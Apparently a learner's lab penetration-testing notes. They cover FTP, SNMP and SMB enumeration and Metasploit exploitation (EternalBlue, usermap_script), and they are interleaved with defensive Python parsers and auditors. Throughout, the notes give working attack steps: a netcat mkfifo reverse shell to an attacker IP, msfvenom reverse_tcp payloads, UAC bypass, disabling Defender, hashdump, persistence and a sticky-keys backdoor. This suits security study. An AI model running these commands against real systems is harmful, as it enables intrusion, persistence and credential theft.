notes
FTP
what is ftp (file transfer protocol)?
FTP, or File Transfer Protocol, is a method used to transfer files between computers over the internet. You can use FTP to upload files to a website or download files from one, typically using special software called an FTP client.
port: 21 (this is the command port, used for sending commands between the client and the server)
note: port 20 = data transfer port in active mode FTP.
VERIFY THE FTP PORT IS OPEN/CLOSED BY
nmap -p 21 192.168.0.1
nmap -Pn -sV -sC -p 21 192.168.0.1 (version scan and default script scan of port 21)
check the version of the ftp server and whether "anonymous login is allowed or not"
ANONYMOUS LOGIN OF FTP
if ftp port 21 is open and anonymous login is allowed, use the command below for anonymous login
ftp 192.168.0.1
enter username as "anonymous" and password as "anonymous".
check whether the login is successful or not
EXPLOITING METASPLOITABLE2 VIA FTP AND ESTABLISHING A METERPRETER SESSION
steps:
> search for the version of ftp
> search for an exploit on the internet
> use the exploit in msfconsole
> set rhosts
> upgrade the session to meterpreter
nmap -p 21 --script ftp-brute X.X.X.X
using the exploit of ftp version
upgrade the session to meterpreter session
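Added example (mine, not from these notes and not nmap's own code): a Python triage helper that reads the normal output of the nmap -sV -sC scan above for several hosts, pulls out the port 21 state, the service version string and the ftp-anon verdict, and lists the hosts that accept anonymous login so they can be reviewed first. The scan text below is constructed for the example; the host addresses and the version banner are made up.

```python
import re

# Constructed sample of nmap normal output for "nmap -Pn -sV -sC -p 21 <host>" run
# against two hosts; the addresses and the version banner are made up for this example.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.0.1
Host is up (0.00042s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     exampleftpd 1.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jan 01  2024 pub
| ftp-syst:
|   STAT:
|_  exampleftpd 1.2 - constructed banner

Nmap scan report for 192.168.0.9
Host is up (0.00051s latency).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
"""

HOST_RE = re.compile(r"Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^21/tcp\s+(\w+)\s+ftp\s*(.*)$")

def parse_ftp_scan(text):
    """Return one dict per host: address, port 21 state, version string, anonymous flag."""
    results, current = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = {"host": m.group(1), "state": None, "version": "", "anonymous": False}
            results.append(current)
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current["state"], current["version"] = m.group(1), m.group(2).strip()
            continue
        # ftp-anon (one of the default scripts run by -sC) reports the result on its first line
        if line.startswith("| ftp-anon:") and "Anonymous FTP login allowed" in line:
            current["anonymous"] = True
    return results

def hosts_to_review(results):
    """Hosts with port 21 open and anonymous login allowed: review what the share exposes."""
    return [r["host"] for r in results if r["state"] == "open" and r["anonymous"]]

if __name__ == "__main__":
    parsed = parse_ftp_scan(SAMPLE_SCAN)
    for entry in parsed:
        print(entry)
    print("anonymous ftp to review:", hosts_to_review(parsed))
```

Feed it the saved output of the scan (nmap -oN) covering a whole subnet and the version column tells you which servers need patching while the anonymous list tells you which ones need their share contents and write permissions checked.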
SNMP
WHAT IS THE SNMP PROTOCOL?
Simple Network Management Protocol (SNMP) is an application layer protocol used for managing and
monitoring network devices, such as routers, switches, servers, and printers. It enables network administrators to
collect and organize information about networked devices and to modify device configurations remotely.
PORT: 161 (UDP PORT)
vulnerabilities:
• version 1 is more vulnerable compared to version 2
• version 3 is more secure; it is not vulnerable.
CHECK THE PORT DETAILS
nmap -p161 -sU -sV 115.74.195.118
after getting nmap results search for snmp version and community details
SNMPWALK
snmpwalk -v1 -c public <ip>
# -v for version
# -c for community
check the results: we get valid information such as OIDs (object identifiers), MIB entries, etc.
SNMP-CHECK
snmp-check -v1 -c public -p 161 ip
check the results:
we will get information like
• system info, network info, network interfaces, routing information, ip address, tcp and udp listening information, storage information
SNMP ENUMERATION USING MSFCONSOLE
> msfconsole -q
> use auxiliary/scanner/snmp/snmp_enum
> options
> set rhosts ip
> run
check the results
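Added example (mine, not from these notes, net-snmp or snmp-check): a Python parser for the snmpwalk output above that maps OIDs to values, extracts the system and interface fields that snmp-check summarizes, and records why a walk that succeeds with -v1 -c public is a finding in itself. The walk output is constructed for the example in the numeric-OID form net-snmp prints when no MIB files are installed; the hostname, contact, location and interface names are made up.

```python
import re

# Constructed sample of "snmpwalk -v1 -c public <ip>" output; values are made up.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux target 5.4.0-generic x86_64"
iso.3.6.1.2.1.1.3.0 = Timeticks: (123456) 0:20:34.56
iso.3.6.1.2.1.1.4.0 = STRING: "netops@example.test"
iso.3.6.1.2.1.1.5.0 = STRING: "target"
iso.3.6.1.2.1.1.6.0 = STRING: "Lab rack 2"
iso.3.6.1.2.1.2.1.0 = INTEGER: 2
iso.3.6.1.2.1.2.2.1.2.1 = STRING: "lo"
iso.3.6.1.2.1.2.2.1.2.2 = STRING: "eth0"
"""

# Well-known OIDs from the MIB-II system and interfaces groups (RFC 1213).
SYSTEM_OIDS = {
    "1.3.6.1.2.1.1.1.0": "sysDescr",
    "1.3.6.1.2.1.1.4.0": "sysContact",
    "1.3.6.1.2.1.1.5.0": "sysName",
    "1.3.6.1.2.1.1.6.0": "sysLocation",
}
IF_DESCR_PREFIX = "1.3.6.1.2.1.2.2.1.2."   # ifDescr.<ifIndex>

LINE_RE = re.compile(r"^(\S+)\s+=\s+([A-Za-z-]+):\s*(.*)$")

def normalize_oid(oid):
    """Turn net-snmp's 'iso.3.6...' spelling into dotted numeric '1.3.6...'."""
    return "1." + oid[len("iso."):] if oid.startswith("iso.") else oid

def parse_snmpwalk(text):
    """Map each OID to (type, value), stripping the quotes net-snmp puts around strings."""
    walk = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        oid, vtype, value = m.groups()
        value = value.strip()
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = value[1:-1]
        walk[normalize_oid(oid)] = (vtype, value)
    return walk

def summarize(walk):
    """Pull the fields snmp-check reports: system info plus interface names in ifIndex order."""
    summary = {name: walk[oid][1] for oid, name in SYSTEM_OIDS.items() if oid in walk}
    ifs = [(int(oid[len(IF_DESCR_PREFIX):]), v)
           for oid, (_, v) in walk.items() if oid.startswith(IF_DESCR_PREFIX)]
    summary["interfaces"] = [v for _, v in sorted(ifs)]
    return summary

def exposure_notes(version, community):
    """Why a walk that succeeded with these settings is a finding on its own."""
    notes = []
    if version in ("1", "2c"):
        notes.append("community string travels in clear text (no SNMPv3 authentication or privacy)")
    if community.lower() in ("public", "private"):
        notes.append(f"default community string '{community}' accepted")
    return notes

if __name__ == "__main__":
    walk = parse_snmpwalk(SAMPLE_WALK)
    print(summarize(walk))
    for note in exposure_notes("1", "public"):
        print("finding:", note)
```

Save the real walk with snmpwalk ... > walk.txt and pass the file contents to parse_snmpwalk; if your system has MIBs installed the OIDs print as names (SNMPv2-MIB::sysDescr.0), and in that case run snmpwalk with -On to keep the numeric form the lookup table expects.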
SMB
WHAT IS SMB ?
SMB, or Server Message Block, is the modernized version of what used to be known as the
Common Internet File System. It works as an application layer network protocol and is designed
to be used as a file sharing protocol. Different applications on a system can read and write
simultaneously to files and request services from the server inside a network. One of the
interesting properties of SMB is that it can run on top of TCP/IP or other network
protocols.
PORT : 445 /TCP
scan the smb port to check whether it is open or not
> nmap -p 445 -sV 192.168.0.2
check the port state and the version of smb
SMB ANONYMOUS LOGIN USING “SMBCLIENT"
> smbclient -L <target ip>
check the share names or folders ("check for the tmp folder because it has full access")
to access a folder use this command; don't enter any password, just press enter
> smbclient //target/tmp
we can upload files to and download files from the target
ANONYMOUS LOGIN USING “SMBMAP”
use the command
> smbmap -H <target ip>
check the permissions of each folder; only "tmp" has both read and write permissions
ANONYMOUS LOGIN USING “CRACKMAPEXEC”
use the command
> crackmapexec smb target
> crackmapexec smb target -u '' -p '' --shares
check the results
ANONYMOUS LOGIN USING "ENUM4LINUX"
use the command
> enum4linux target
check the results; we get information about the target like the nbtstat scan, usernames, passwords, etc.
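Added example (mine, not from these notes or from smbmap): a Python parser for the share table smbmap prints in the anonymous-login check above, which flags the shares an unauthenticated user can read or write (the "tmp" case described above). The table below is constructed in smbmap's tab-separated layout; the share names and comments are made up.

```python
import re

# Constructed sample in the tabular form smbmap prints for "smbmap -H <target ip>".
# The IP matches the lab target in these notes; share comments are made up.
SAMPLE_SMBMAP = (
    "[+] IP: 192.168.0.2:445\tName: 192.168.0.2\n"
    "        Disk                 \tPermissions\tComment\n"
    "\t----                 \t-----------\t-------\n"
    "\tprint$               \tNO ACCESS\tPrinter Drivers\n"
    "\ttmp                  \tREAD, WRITE\tscratch space\n"
    "\topt                  \tNO ACCESS\t\n"
    "\tIPC$                 \tNO ACCESS\tIPC Service (example server)\n"
    "\tADMIN$               \tNO ACCESS\tIPC Service (example server)\n"
)

# One share per row: name, the permission phrase smbmap uses, free-text comment.
ROW_RE = re.compile(r"^\s*(\S+)\s+(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(.*)$")

def parse_smbmap(text):
    """Return one dict per share row; header and separator lines do not match ROW_RE."""
    shares = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, perms, comment = m.groups()
            shares.append({"share": name, "perms": perms, "comment": comment.strip()})
    return shares

def readable_shares(shares):
    return [s["share"] for s in shares if "READ" in s["perms"]]

def writable_shares(shares):
    """Shares an unauthenticated user can write to: the 'tmp' situation in these notes."""
    return [s["share"] for s in shares if "WRITE" in s["perms"]]

def report(shares):
    """One line per share the anonymous session can actually reach."""
    lines = []
    for s in shares:
        if s["perms"] == "NO ACCESS":
            continue
        if "WRITE" in s["perms"]:
            risk = "writable: anyone can drop or alter files here"
        else:
            risk = "readable: contents are exposed to anyone on the network"
        lines.append(f"{s['share']} ({s['perms']}): {risk}")
    return lines

if __name__ == "__main__":
    shares = parse_smbmap(SAMPLE_SMBMAP)
    for line in report(shares):
        print(line)
```

Share names containing spaces would need a tab-aware split instead of the whitespace regex; smbmap pads the columns with spaces and separates them with tabs, so splitting on "\t" and stripping each cell handles that case.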
SMB ANONYMOUS LOGIN USING “ MSFCONSOLE ”
in msfconsole:
> check the version of smb through the nmap scan > nmap -p 445 -sV target
> search the version online and find the exploit
> in msfconsole > use exploit/multi/samba/usermap_script
> options
> set rhost 192.168.0.2 (target ip)
> run, then background the session (bg)
> use multi/handler
> sessions
> you will find one session; upgrade it using > sessions -u 1
> you will get the meterpreter session
check the target ip and versions of the smb
use the exploit
set rhost and rport, run the exploit and use the multi/handler
check the meterpreter sessions
WINDOWS
eternal blue
description :
The "EternalBlue" exploit, officially known as MS17-010, targets a vulnerability in Microsoft's Server Message Block (SMB) protocol and was infamously used in large-scale cyber attacks like WannaCry. The Metasploit Framework (MSF) provides a powerful environment for exploiting this vulnerability using msfconsole.
If successful, you'll get a Meterpreter session, which provides a range of post-exploitation capabilities, such as:
• File system navigation
• Privilege escalation
• Dumping credentials (e.g., passwords)
• Keylogging or screenshot capture
note: it only works on smb version 1
steps:
> check whether the smb port is open or not
> msfconsole
> search eternal blue and use it
> set rhost (target)
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost and lport (local)
• using the eternal blue exploit
• set rhost
• set lport and lhost
• set payload windows/x64/meterpreter/reverse_tcp
getting the meterpreter shell
taking the screenshot
bypass_uac
description:
Privilege escalation using the "Bypass UAC" technique in Metasploit allows you to escalate privileges to SYSTEM or
an Administrator account from a lower-privileged context on Windows. Here's a step-by-step guide to perform
privilege escalation using the bypass UAC module in Metasploit:
Prerequisites:
• Low-privileged session: You should already have a foothold on the target system, such as a Meterpreter
session with low privileges.
• Windows machine: The target machine should be Windows, and User Account Control (UAC) should be
enabled.
• Metasploit framework installed on your attacker machine.
steps:
> create a payload using
> msfvenom -p windows/meterpreter/reverse_tcp lhost=eth0 lport=1234 -f exe > a1.exe
> transfer the file to the target using a python server
> msfconsole
> use multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost and lport
> run (run the payload on the target machine and we will get a meterpreter session with low privilege)
> background the session
> search bypass_uac (use fodhelper)
> set session 1
> run
> sessions 1 (type getuid; we will get user level access only)
> getsystem (we will get NT AUTHORITY access)
• creating the payload and transferring it to the target
• using multi/handler and getting a meterpreter session
• search for bypass_uac and use it
• getting admin level access
• we can crack the hashes using https://crackstation.net/
defender_bypass
disable the firewall using the group policy
steps:
> win+r (gpedit.msc)
> administrative templates >> windows components >> windows defender antivirus
>> enable "turn off defender"
password_change
description:
Metasploit Framework (MSF) is a powerful tool often used in penetration testing and security research. MSFconsole, the command-line interface for the framework, offers the ability to interact with compromised systems, including Windows machines. One common post-exploitation step is to retrieve and change passwords.
Prerequisites:
1. Metasploit Framework Installed on Kali Linux or another pentesting distribution.
2. A target Windows machine vulnerable to exploitation.
3. An open session on the target machine (using any suitable exploit from Metasploit).
4. Basic understanding of post-exploitation and Windows authentication systems.
steps:
> open msfconsole
> open a session on the target using any technique (using multi/handler, using eternal blue, ...)
> to know the password of the target use "hashdump", or use post/windows/gather/phish_windows_credentials
> set session 1
> run (we will get the password of the target)
> now we have to change the password
> use post/windows/manage/change_password
> set smbuser raj
> set old_password 123
> set new_password 987
> set session 1
> exploit
(we successfully changed the password of the target)
persistence
description:
MSFconsole, the command-line interface of the Metasploit Framework, provides tools to establish persistence
on Windows systems. This allows the attacker to regain access to the system even after it has been rebooted or
the initial exploit session has ended.
This guide covers how to use Metasploit's post-exploitation features to establish persistence on a compromised
Windows machine.
Prerequisites:
1. Metasploit Framework Installed on a penetration testing system (e.g., Kali Linux).
2. A Windows system that has been successfully compromised using an exploit.
3. An active Meterpreter session on the target machine.
steps:
> msfconsole
> create a payload using "msfvenom -p windows/meterpreter/reverse_tcp lhost=eth0 lport=1234 -f exe > a.exe"
> get shell access using "use multi/handler"
> get privilege escalation using "bypass uac"
> use post/windows/manage/persistence
> set session
> set REXENAME and REXEPATH
> run
> whenever the target system gets restarted we will get the session again
rdesktop
description:
In penetration testing, exploiting vulnerabilities in remote desktop services, such as those provided by rdesktop
or Windows Remote Desktop Protocol (RDP), can lead to unauthorized access to systems. MSFconsole, the
command-line interface of the Metasploit Framework, offers powerful modules to target weaknesses in RDP
implementations. This guide provides a step-by-step approach to exploiting vulnerabilities in RDP services on a
Windows machine using MSFconsole.
steps:
> msfconsole
> create a payload using "msfvenom -p windows/meterpreter/reverse_tcp lhost=eth0 lport=1234 -f exe > a.exe"
> use multi/handler (get shell access by running the payload on the target machine)
> get privilege escalation using "bypass uac"
> after getting the NT AUTHORITY session
> search enable rdp (use it)
> set session (run it)
> search sticky (use it)
> set session
> run
note: change the remote desktop setting in control panel and uncheck the user in "select the users who can use remote desktop"
> nmap -p3389 192.168.132.195 (to check whether the rdp port is open or not)
> rdesktop 192.168.132.195 (we will get remote desktop access)
> press the shift key 5 times
* if we know the user and password we can access the remote desktop
NMAP
NMAP SCRIPT
WHAT IS SCRIPT SCAN?
Nmap Scripts (NSE - Nmap Scripting Engine)
Nmap includes a powerful feature called the Nmap Scripting Engine (NSE), which allows users to write and use
scripts to automate tasks related to network discovery, vulnerability detection, and exploitation. NSE scripts
extend Nmap's capabilities beyond simple port scanning, allowing for deeper analysis of network services.
> nmap --script <script_name> target
to find all nmap scripts:
> cd /usr/share/nmap/scripts
> nmap --script=smb-double-pulsar-backdoor.nse 192.168.0.7 -p 445 -Pn
--script selects the scripts for the script scan
> nmap --script=smb* -p 445 192.168.0.7
to scan with all the smb scripts
>nmap --script=vuln 192.168.0.7 -p 445
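Added example (mine, not from these notes or from nmap): a Python indexer for the categories line that every NSE script carries, which is what a category selector such as --script=vuln matches on. It shows which scripts in a category are not also tagged safe, so you know before running --script=vuln or --script=smb* which of them are brute-force, intrusive or denial-of-service scripts. The script headers below are constructed stand-ins with made-up names; load_scripts_dir reads the real files from /usr/share/nmap/scripts.

```python
import os
import re

# Constructed NSE headers (only the fields that matter here); names and bodies are made up.
SAMPLE_SCRIPTS = {
    "demo-banner.nse": 'description = [[Grabs a banner.]]\ncategories = {"default", "discovery", "safe"}\n',
    "demo-brute.nse": 'description = [[Guesses credentials.]]\ncategories = {"brute", "intrusive"}\n',
    "demo-vuln-check.nse": "description = [[Checks a known bug.]]\ncategories = {'vuln', 'safe'}\n",
    "demo-dos.nse": 'categories = {\n  "dos",\n  "intrusive",\n}\n',
}

# categories = {"a", "b"} is a Lua table; it may span several lines and use either quote style.
CAT_RE = re.compile(r"categories\s*=\s*\{([^}]*)\}", re.S)

def parse_categories(nse_text):
    """Return the category names declared by one script, in declaration order."""
    m = CAT_RE.search(nse_text)
    if not m:
        return []
    return re.findall(r"""["']([^"']+)["']""", m.group(1))

def index_scripts(scripts):
    """Map category -> sorted list of script names (scripts is {name: file text})."""
    index = {}
    for name, text in scripts.items():
        for cat in parse_categories(text):
            index.setdefault(cat, []).append(name)
    return {cat: sorted(names) for cat, names in index.items()}

def not_safe(scripts, category):
    """Scripts selected by `category` that are not also tagged 'safe'."""
    out = []
    for name, text in scripts.items():
        cats = parse_categories(text)
        if category in cats and "safe" not in cats:
            out.append(name)
    return sorted(out)

def load_scripts_dir(path="/usr/share/nmap/scripts"):
    """Read every .nse file in the nmap scripts directory into {name: text}."""
    scripts = {}
    for name in os.listdir(path):
        if name.endswith(".nse"):
            with open(os.path.join(path, name), encoding="utf-8", errors="replace") as f:
                scripts[name] = f.read()
    return scripts

if __name__ == "__main__":
    scripts = SAMPLE_SCRIPTS
    for cat, names in sorted(index_scripts(scripts).items()):
        print(f"{cat}: {', '.join(names)}")
    print("intrusive scripts in 'vuln':", not_safe(scripts, "vuln"))
```

Run it with scripts = load_scripts_dir() on a real install to see what --script=vuln would actually launch against a host; anything listed by not_safe(scripts, "vuln") deserves a second look before pointing it at production systems.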
Linux privilege escalation
Linux Root Privilege Escalation: A Brief Overview
Root Privilege Escalation refers to the process where a user or an attacker gains elevated access, typically root
(administrator) privileges, from a lower-privileged account. This is a critical security issue as it allows full control
over the system.
Common Methods of Root Privilege Escalation:
1. Kernel exploits:
• Vulnerabilities in the Linux kernel: exploiting bugs in the kernel can allow attackers to run arbitrary code with root privileges.
2. SUID (Set-User-ID) programs:
• SUID programs run with the privileges of the file owner (often root). If misconfigured or vulnerable, these can be exploited for privilege escalation.
3. Weak file permissions:
• Misconfigured permissions on critical files (like /etc/passwd or /etc/shadow) may allow unauthorized access or modifications, leading to root privilege.
4. Poor sudo configuration:
• Misconfigurations in /etc/sudoers or unrestricted use of the sudo command may allow privilege escalation.
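Added example (mine, not from these notes): a Python audit for the host-side conditions in points 2 and 3 above, i.e. root-owned SUID binaries sitting outside the usual system directories, /etc/passwd, /etc/shadow and /etc/sudoers being writable by non-root or not owned by root, /etc/shadow being world-readable, and world-writable files under /etc. audit_entries works on (path, mode, uid) tuples so it can be tested against the constructed sample below; collect_live produces the same tuples from real os.lstat results. The sample paths, modes and owners are made up.

```python
import os
import stat

# Constructed sample of filesystem entries (path, st_mode, owner uid) standing in for
# os.lstat() results; paths and modes are made up for this example.
SAMPLE_ENTRIES = [
    ("/etc/passwd", 0o100644, 0),
    ("/etc/shadow", 0o100640, 0),
    ("/etc/sudoers", 0o100440, 0),
    ("/usr/bin/passwd", 0o104755, 0),      # legitimate root SUID binary
    ("/opt/tools/backup", 0o104755, 0),    # root SUID binary outside the system paths
    ("/etc/cron.d/sync", 0o100666, 0),     # world-writable file under /etc
    ("/home/dev/notes.txt", 0o100644, 1000),
]

# Files that must stay root-owned and writable by root only.
SENSITIVE = {"/etc/passwd", "/etc/shadow", "/etc/sudoers"}
# Where root-owned SUID binaries are expected; anywhere else they deserve a look.
EXPECTED_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")

def audit_entries(entries):
    """Return (path, finding) pairs for the classic privilege escalation misconfigurations."""
    findings = []
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode):          # skip directories, symlinks, devices
            continue
        world_w = bool(mode & stat.S_IWOTH)
        group_w = bool(mode & stat.S_IWGRP)
        if path in SENSITIVE and (world_w or group_w or uid != 0):
            findings.append((path, "sensitive file writable by non-root or not owned by root"))
        if path == "/etc/shadow" and mode & stat.S_IROTH:
            findings.append((path, "/etc/shadow readable by everyone"))
        if mode & stat.S_ISUID and uid == 0 and not path.startswith(EXPECTED_SUID_DIRS):
            findings.append((path, "root-owned SUID binary outside standard paths"))
        if world_w and path.startswith("/etc/"):
            findings.append((path, "world-writable file under /etc"))
    return findings

def collect_live(roots=("/etc", "/usr/bin", "/usr/sbin", "/opt")):
    """Walk real directories and yield entries shaped like SAMPLE_ENTRIES."""
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                yield (path, st.st_mode, st.st_uid)

if __name__ == "__main__":
    # Swap SAMPLE_ENTRIES for collect_live() to audit the machine this runs on.
    for path, why in audit_entries(SAMPLE_ENTRIES):
        print(f"{path}: {why}")
```

The expected-directory list is a starting point, not a whitelist: a SUID binary in /usr/bin can still be a problem if it is a known-abusable program or a custom build, so the output is a list of things to review, not a verdict.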
encrypted reverse shell
WHAT IS REVERSE SHELL ?
A reverse shell is a type of network connection that allows an external attacker to gain remote control over a
target machine. In this setup, instead of the attacker directly connecting to the target (which might be protected
by a firewall), the target machine initiates a connection back to the attacker's machine. This reversal is why it's
called a "reverse" shell.
WHAT IS AN ENCRYPTED SHELL ?
An encrypted shell refers to a secure communication channel between two systems, typically used for remote administration, where data transmitted over the shell is encrypted to prevent unauthorized access and eavesdropping. This type of shell ensures that the commands, responses, and any other data shared during a remote session remain confidential.
NETCAT REVERSE SHELL
let the kali ip be 192.168.0.5
let the ubuntu ip be 192.168.0.6
use the payload and run it on the target machine (ubuntu)
> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.5 1234 >/tmp/f (the mentioned ip is the kali ip, i.e. the attacker's ip)
let's run the netcat listener on the kali machine
> nc -lvp 1234
check the results in wireshark
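Added example (mine, not from these notes): a host-side check in Python for the netcat reverse shell above, seen from the defender's side of the ubuntu box. The mkfifo payload leaves nc holding an established outbound TCP socket, which is visible in ss -tnp; the parser flags established connections owned by shells, netcat and scripting interpreters, processes that normally have no business holding a network socket themselves. The ss output below is constructed for the example using the lab addresses from these notes; the pids and the other processes are made up.

```python
import re
import subprocess

# Constructed sample of "ss -tnp" output on the ubuntu host (192.168.0.6); the nc line is
# what the mkfifo payload leaves behind, the other rows are made-up normal traffic.
SAMPLE_SS = """\
State Recv-Q Send-Q  Local Address:Port   Peer Address:Port  Process
ESTAB 0      0       192.168.0.6:44822    192.168.0.5:1234   users:(("nc",pid=2311,fd=3))
ESTAB 0      0       192.168.0.6:51002    192.168.0.20:443   users:(("firefox",pid=1800,fd=55))
ESTAB 0      0       192.168.0.6:22       192.168.0.50:60110 users:(("sshd",pid=901,fd=5))
ESTAB 0      0       192.168.0.6:39018    192.168.0.5:4444   users:(("bash",pid=2400,fd=1))
"""

# Process names that should not own an outbound TCP socket on a server.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "nc", "ncat", "netcat", "socat",
              "python", "python3", "perl", "php", "ruby", "telnet"}

# Each socket owner appears as ("name",pid=N,fd=M) inside users:(...)
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')

def parse_ss(text):
    """Return (state, local, peer, [(proc, pid), ...]) per socket line, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        state, _, _, local, peer = parts[:5]
        process_field = parts[5] if len(parts) > 5 else ""
        procs = [(name, int(pid)) for name, pid in PROC_RE.findall(process_field)]
        rows.append((state, local, peer, procs))
    return rows

def suspicious_connections(rows):
    """Established connections held directly by a shell, netcat or interpreter."""
    hits = []
    for state, local, peer, procs in rows:
        if state != "ESTAB":
            continue
        for name, pid in procs:
            if name in SHELL_LIKE:
                hits.append({"proc": name, "pid": pid, "local": local, "peer": peer})
    return hits

def live_check():
    """Run ss on this host and return the suspicious rows (needs root to see other users' pids)."""
    out = subprocess.run(["ss", "-tnp"], capture_output=True, text=True, check=False).stdout
    return suspicious_connections(parse_ss(out))

if __name__ == "__main__":
    for hit in suspicious_connections(parse_ss(SAMPLE_SS)):
        print(f"pid {hit['pid']} ({hit['proc']}) {hit['local']} -> {hit['peer']}")
```

The name list is a heuristic: a legitimate admin script in python will show up too, so each hit needs a look at the process command line (/proc/<pid>/cmdline) and its parent; and because ss -p only shows processes you can see, run live_check as root. On the wire, the same session is plain text, which is what the wireshark check above shows and why the encrypted variant exists.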
WINDOWS
WEB_DELIVERY
getting powershell access using the web_delivery exploit
STEPS:
> msfconsole -q
> search web_delivery and use it
> set lhost
> set target PSH\ (Binary)
> set payload windows/powershell_reverse_tcp
> advanced
> set PSH-EncodedCommand false
> run
> we will get a payload; paste it into cmd on the windows machine, after that we will get powershell access
misconfiguration
About the misconfiguration
When the “Always install with elevated privileges” setting is enabled, it allows Windows
Installer packages (.msi files) to be installed with administrative privileges by any user,
including those with limited permissions. This feature is intended for ease of software
deployment in enterprise environments but can be exploited by malicious users to gain elevated
access to the system.
steps:
> gpedit.msc in the run dialog box (win + R)
> administrative templates >> windows components >> always install with elevated privileges >> enabled
> open cmd
> gpupdate /force
> create a payload using revshell for powershell
> nc -lvnp 8000
> enter the below commands
> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
> reg query HKLM\Software\Policies\Microsoft\Windows\Installer
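Added example (mine, not from these notes): a Python parser for the reg query output above, with checks for the three Windows settings that the bypass_uac, rdesktop (sticky keys) and "always install with elevated privileges" sections of these notes rely on: AlwaysInstallElevated in both HKLM and HKCU (the policy only takes effect when both are set), an Image File Execution Options Debugger value on sethc.exe (the mechanism behind the sticky keys trick, and the thing to look for when checking a machine for it), and EnableLUA (whether UAC is on). The reg query text is constructed for the example; the Debugger path is a made-up sample value, and the HKLM/HKCU Installer, IFEO and Policies\System key paths are the real registry locations.

```python
import re

# Constructed sample in the layout "reg query <key>" prints; values are made up for this example.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
    Debugger    REG_SZ    C:\Windows\System32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
"""

# Value lines are indented: <name>    <REG_type>    <data>; names may contain single spaces.
VALUE_RE = re.compile(r"^\s+(\S.*?)\s{2,}(REG_[A-Z_]+)\s+(.*)$")

def parse_reg_query(text):
    """Map each key path (lower-cased, the registry is case-insensitive) to {name: (type, data)}."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():           # key paths start in column 0
            current = line.strip().lower()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, vtype, data = m.groups()
            keys[current][name] = (vtype, data.strip())
    return keys

def dword(keys, key, name):
    """Integer data of a REG_DWORD value, or None if the key or value is absent."""
    entry = keys.get(key.lower(), {}).get(name)
    if entry is None or entry[0] != "REG_DWORD":
        return None
    return int(entry[1], 16)

INSTALLER = r"Software\Policies\Microsoft\Windows\Installer"
IFEO_SETHC = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

def check_always_install_elevated(keys):
    """Effective only when both the machine and the user policy value are 1."""
    hklm = dword(keys, "HKEY_LOCAL_MACHINE\\" + INSTALLER, "AlwaysInstallElevated")
    hkcu = dword(keys, "HKEY_CURRENT_USER\\" + INSTALLER, "AlwaysInstallElevated")
    return hklm == 1 and hkcu == 1

def check_sticky_keys_debugger(keys):
    """Return the Debugger program registered for sethc.exe, or None if there is none."""
    entry = keys.get(IFEO_SETHC.lower(), {}).get("Debugger")
    return entry[1] if entry else None

def check_uac_enabled(keys):
    """EnableLUA = 1 means UAC prompts stand between a standard user and admin rights."""
    return dword(keys, UAC_KEY, "EnableLUA") == 1

def findings(keys):
    out = []
    if check_always_install_elevated(keys):
        out.append("AlwaysInstallElevated set in HKLM and HKCU: any user can install .msi packages with administrative privileges")
    debugger = check_sticky_keys_debugger(keys)
    if debugger:
        out.append(f"sethc.exe has an IFEO Debugger ({debugger}): sticky keys backdoor indicator")
    if not check_uac_enabled(keys):
        out.append("UAC is disabled (EnableLUA is not 1)")
    return out

if __name__ == "__main__":
    for line in findings(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print("finding:", line)
```

Capture the real input with reg query on each of the three keys (redirecting to a file) and pass the concatenated text to parse_reg_query; a key that does not exist yields a "cannot find" error line from reg, which the parser treats as a missing key, so the corresponding check simply reports nothing.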
winpeas
description:
this covers the process of leveraging WinPEAS, a popular privilege escalation tool for Windows, to discover system vulnerabilities or misconfigurations that can be exploited to obtain an encrypted reverse shell on a compromised machine.
steps:
method 1:
> open revshell
> create a payload for powershell
> run the payload in powershell
> in kali use >> nc -lvnp 8000 (we will get shell access)
> run winpeas.exe in the shell using >> ./winPEASx64.exe
method 2:
> use msfvenom -p windows/meterpreter/reverse_tcp lhost=eth0 lport=1234 -f exe > a.exe
> upload the payload to the target via a python server
> msfconsole
> use multi/handler
